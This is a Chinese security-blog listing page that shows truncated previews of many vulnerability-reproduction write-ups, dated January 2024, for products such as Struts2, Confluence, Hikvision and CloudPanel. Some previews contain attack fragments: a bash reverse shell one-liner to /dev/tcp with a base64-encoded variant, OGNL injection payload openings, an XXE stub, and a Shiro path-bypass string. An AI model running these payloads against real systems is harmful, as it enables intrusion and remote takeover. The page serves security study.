[漏洞复现]

漏洞复现】Hikvision流媒体管理服务器信息泄露漏洞

Nx01产品简介Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。Nx02漏洞描述HikvisionHikvision流媒体管理服务器user.xml配置文件存在未授权访问,攻击者通过漏洞可以获取网站账号密码。Nx03产品主页fofa-quer
晚风不及你ღ·2024-01-25 23:27

中间件安全

中间件安全vulhub漏洞复现:https://vulhub.org/操作教程:https://www.freebuf.com/sectool/226207.html一、ApacheApache(音译为阿帕奇
果粒程1122·2024-01-25 18:29

Monitorr 任意文件上传漏洞复现(CVE-2024-0713)

0x01产品简介Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。0x02漏洞概述Monitorr1.7.6m版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件/assets/php/upload.php的未知功能。对参数fileToUpload的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。0x03复现环境FOFA:body=
OidBoy_G·2024-01-25 06:01

Atlassian Confluence Data Center and Server 权限提升漏洞复现(CVE-2023-22515)

0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluenceDataCenterandServer存在权限提升漏洞,未经身份验证的远程攻击者可以利用该漏洞
OidBoy_G·2024-01-25 06:30

蓝凌OA sysUiExtend.do 任意文件上传漏洞复现

0x01产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。0x02漏洞概述蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩
OidBoy_G·2024-01-25 06:28

[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2134)

二、漏洞复现春秋云境.com进入靶场开始复现构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key·2024-01-25 06:41

[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

二、漏洞复现春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key·2024-01-25 06:10

[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)

二、漏洞复现春秋云境.com进入靶场开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key·2024-01-25 06:10

[漏洞复现] Craft (CVE-2023-41892)

前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key·2024-01-25 06:10

[漏洞复现]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)

二、漏洞复现春秋云境.com进入靶场开始复现/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key·2024-01-25 06:10

[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2135)

二、漏洞复现春秋云境.com进入靶场开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key·2024-01-25 06:04

D-Tale SSRF漏洞复现(CVE-2024-21642)

0x01产品简介D-tale是一个在2020年2月推出的库,是Pandas数据结构的可视化工具。它具有许多功能,对于探索性数据分析非常方便、支持交互式绘图、3d绘图、热图、特征之间的相关性、构建自定义列等等。0x02漏洞概述D-Tale是Pandas数据结构的可视化工具。3.9.0之前的D-Tale版本的用户可能容易受到服务器端请求伪造(SSRF)的攻击,从而使攻击者能够访问服务器上的文件。0x0
OidBoy_G·2024-01-24 22:45

【复现】Hytec Inter HWL 2511 SS路由器RCE漏洞_25

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述HytecInterHWL2511SS是日本HytecInter公司的一款工业级LTE路由器,可用于远程数据传输
穿着白衣·2024-01-24 22:44

【复现】万户ezoffice协同管理平台 SQL注入漏洞_26

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述万户ezOFFICE协同管理平台分为企业版和政务版。
穿着白衣·2024-01-24 22:44

【复现】奥威亚视屏云平台文件读取漏洞_27

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述奥威亚视屏云平台拥有丰富的应用模块,包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI
穿着白衣·2024-01-24 22:44

【复现】D-Tale SSRF漏洞(CVE-2024-21642)_26

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述D-Tale数据可视化插件是后端框架Flask与前端框架React组合产生的一款开源的数据可视化分析插件。
穿着白衣·2024-01-24 22:13

漏洞复现】用友NC Cloud portal/file接口任意文件读取漏洞

文章目录前言声明一、用友NCCloudportal/file接口简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。
李火火安全阁·2024-01-24 00:32

用友 GRP U8 UploadFile 命令执行漏洞

文章目录前言声明一、漏洞描述二、影响版本三、漏洞复现前言用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
李火火安全阁·2024-01-24 00:57

Atlassian Confluence RCE漏洞复现(CVE-2023-22527)

0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluence/template/aui/text-inline.vm接口处存在velocity模板注入,未
OidBoy_G·2024-01-23 10:24

Aria2 WebUI控制台 任意文件读取漏洞复现(CVE-2023-39141)

0x01产品简介Aria2WebUI控制台是用于下载文件的实用程序。它支持HTTP(S)/FTP/SFTP/BitTorrent和Metalink协议。aria2可以从多个来源/协议下载文件,并尝试利用您的最大下载带宽。它支持同时从HTTP(S)/FTP/SFTP和BitTorrent下载文件,而从HTTP(S)/FTP/SFTP下载的数据上传到BitTorrent群。使用Metalink块校验和
OidBoy_G·2024-01-23 10:24

Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)

0x01产品简介ViessmannVitogate300是用于将ViessmannLON连接到BACnet或Modbus的网关。0x02漏洞概述Vitogate300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。0x03影响范围version<=2.1.3.00x04复现环境FOFA:app="Vito
OidBoy_G·2024-01-23 10:54

PrestaShop购物系统 SQL注入漏洞复现(CVE-2023-30150)

0x01产品简介PrestaShop是一个功能丰富,基于PHP5开发的Web2.0网上购物系统。PrestaShop具有可定制,稳定等特点。整个系统只有5.8MB,易于快速安装。0x02漏洞概述PrestaShop的部分主题中使用LeoCustomAjax模块拓展,LeoCustomAjax模块中可以在/modules/leocustomajax/leoajax.php中使用多个GET参数(cat
OidBoy_G·2024-01-23 10:20

redis未授权访问全漏洞复现

redis未授权访问全漏洞复现Redis有关的漏洞具有明显的时间分段性,在15年11月之前,主要是未授权导致的数据泄露,获得一些账号密码。
清歌secure·2024-01-23 07:03

漏洞复现】SpringBlade export-user接口SQL注入漏洞

文章目录前言声明一、SpringBlade系统简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言SpringBlade是一个由商业级项目升级优化而来的微服务架构采用SpringBoot2.7、SpringCloud2021
李火火安全阁·2024-01-23 02:24

【权限提升】Linux Kernel ebpf 提权漏洞(CVE-2022-23222)

文章目录前言一、漏洞描述二、漏洞影响版本三、漏洞复现四、漏洞修复前言CVE-2022-23222LinuxKernelebpf权限提升漏洞一、漏洞描述eBPF(extendedBerkeleyPacketFilter
李火火安全阁·2024-01-23 02:54

CVE-2020-1938漏洞复现(文末附EXP代码)

CVE-2020-1938ApacheTomcat文件包含漏洞复现1环境搭建1.1Vulhub靶机搭建1.1.1环境安装(1)安装docker$curl-fsSLhttps://get.docker.com
Vitaminapple·2024-01-23 02:53

CVE-2013-2028 经典栈溢出漏洞复现资料整理

一个经典的由整数溢出导致栈溢出的漏洞。下面感觉写的有点乱。复现漏洞CVE-2013-2028:nginx栈溢出漏洞相关基础知识栈的基础知识:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/stack-intro-zh/栈溢出原理:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sta
破落之实·2024-01-23 02:53

CloudPanel file-manager/backend/makefile接口存在远程命令执行漏洞CVE-2023-35885

1.CloudPanel简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。它提供了
sublime88·2024-01-23 02:51

漏洞复现】CloudPanel makefile接口远程命令执行漏洞(CVE-2023-35885)

文章目录前言声明一、CloudPanel简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。
李火火安全阁·2024-01-23 02:20

Jeecg jeecgFormDemoController RCE漏洞复现(CVE-2023-49442)

0x01产品简介Jeecg(J2EECodeGeneration)是一款基于代码生成器的低代码开发平台,使用JEECG可以简单快速地开发出企业级的Web应用系统。0x02漏洞概述Jeecg(J2EECodeGeneration)是开源的代码生成平台,目前官方已停止维护。Jeecg4.0及之前版本中,由于/api接口鉴权时未过滤路径遍历,攻击者可构造包含../的url绕过鉴权。并且内部有使用fast
OidBoy_G·2024-01-22 15:39

万户 ezOFFICE wf_process_attrelate_aiframe.jsp SQL注入漏洞复现

0x01产品简介万户OAezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。0x02漏洞概述万户ezOFFICEwf_process_attrelate_aiframe.
OidBoy_G·2024-01-22 15:09

用友NC portal/file 任意文件读取漏洞复现

0x01产品简介用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。0x02漏洞概述用友NC系统/portal/file等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。0x03复现环境FOFA:app="用
OidBoy_G·2024-01-22 15:09

Laykefu客服系统 任意文件上传漏洞复现

0x01产品简介Laykefu是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。0x02漏洞概述Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用
OidBoy_G·2024-01-22 15:38

Python unpickle 命令执行漏洞复现总结

Pythonunpickle命令执行漏洞复现总结漏洞原理环境说明漏洞复现仅做学习参考使用。
yuQnY·2024-01-22 10:46

漏洞复现】(1day)Bladex快速开发平台sql注入漏洞

0x01阅读须知SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!0x02漏洞描述(一)Bladex快速开发平台BladeX是一款精心设计的
煮豆燃豆萁·2024-01-22 08:22

漏洞复现-企语iFair协同管理系统getuploadimage.jsp接口任意文件读取漏洞(附带漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述企语iFair协同管理系统同时兼容了Linux、Windows两种操作系统,用户可以根据自己需求进行安装使用。
炼金术师诸葛亮·2024-01-22 08:22

漏洞复现-科荣AIO UtilServlet任意命令执行漏洞(附漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述科荣AIOUtilServlet存在任意命令执行漏洞。fofa语句body="changeAccount('8
炼金术师诸葛亮·2024-01-22 08:21

漏洞复现-SpringBlade export-user SQL 注入漏洞(附漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述该系统/api/blade-user/export-user接口存在SQL注入漏洞,会造成数据泄露。fofa语
炼金术师诸葛亮·2024-01-22 08:50

【精选】中间件 tomcat漏洞复现

博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录1、tomcat后台弱口令漏洞利用利用冰蝎连接:2、tomcat远程代码执行漏洞利用冰蝎子连接:
hacker-routing·2024-01-21 04:43

【复现】科达ViewShot登录系统数据库信息泄露漏洞_23

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述科达ViewShot视频监控系统采用数字化、网络化和智能化相融合的新一代视频监控技术,支持领先的视音频编解码算法
穿着白衣·2024-01-20 22:46

【复现】金和 jc6协同管理平台 任意文件上传漏洞(2)_21

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述金和C6协同管理平台包括协同办公管理,人力资源管理,项目管理,客户关系管理,企业目标管理,费用管理,移动办公
穿着白衣·2024-01-20 22:16

【复现】Apache Solr信息泄漏漏洞_24

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述ApacheSolr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。
穿着白衣·2024-01-20 21:45

CVE2020-1938漏洞复现

这个漏洞是tomcat的然后我们先了解漏洞产生的原理首先我们先来看tmocat纠结是干什么的tomcat是个中间件最主要的两个结构、servlet的定义和部分源码,漏洞就是从这来的tomcat处理http请求源码分析tomcat8.5.46哎这教学视频讲半天看不懂不看原理了java我都没学过很多只会helloworld直接实操吧浪费我30min时间直接开始复现docker开始搭建环境我们的主机下载
hellodaoyan·2024-01-20 18:22

SQL注入实战-MySQL

漏洞复现根据提示用base64进行编码1orderby2(3不行)-1unionselect1,database()数据库名称用ascll编码加上0x再进行base64编码-1unionselect1,
Yolo山药·2024-01-20 14:39

CloudPanel RCE漏洞复现(CVE-2023-35885)

0x01产品简介CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机(VM)、存储、网络和应用程序。0x02漏洞概述由于2.3.1之前的CloudPanel具有不安全的文件管理器cookie身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务
OidBoy_G·2024-01-20 07:41

漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

文章目录前言声明一、系统简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统
李火火安全阁·2024-01-20 04:44

Yearning存在任意文件读取漏洞

文章目录前言声明一、Yearning简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言YearningMYSQLSQL语句审核平台。提供查询审计,SQL审核,SQL回滚,自定义工作流等多种功能。
李火火安全阁·2024-01-20 04:11

【复现】SpringBlade SQL 注入漏洞_22

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述SpringBlade是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8API
穿着白衣·2024-01-19 15:49

CVE重要通用漏洞复现java php

在进行漏洞复现之前我们需要在linux虚拟机上进行docker的安装我不喜欢win上安因为不知道为什么总是和我的vmware冲突然后我的kali内核版本太低我需要重新安装一个新的linux并且配置网络我相信这会话费我不少时间查看版本
hellodaoyan·2024-01-19 07:22

泛微E-Cology getLabelByModule SQL注入漏洞复现

0x01产品简介泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。0x02漏洞概述由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获
OidBoy_G·2024-01-19 04:01
上一页 2 3 4 5 6 7 8 9 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他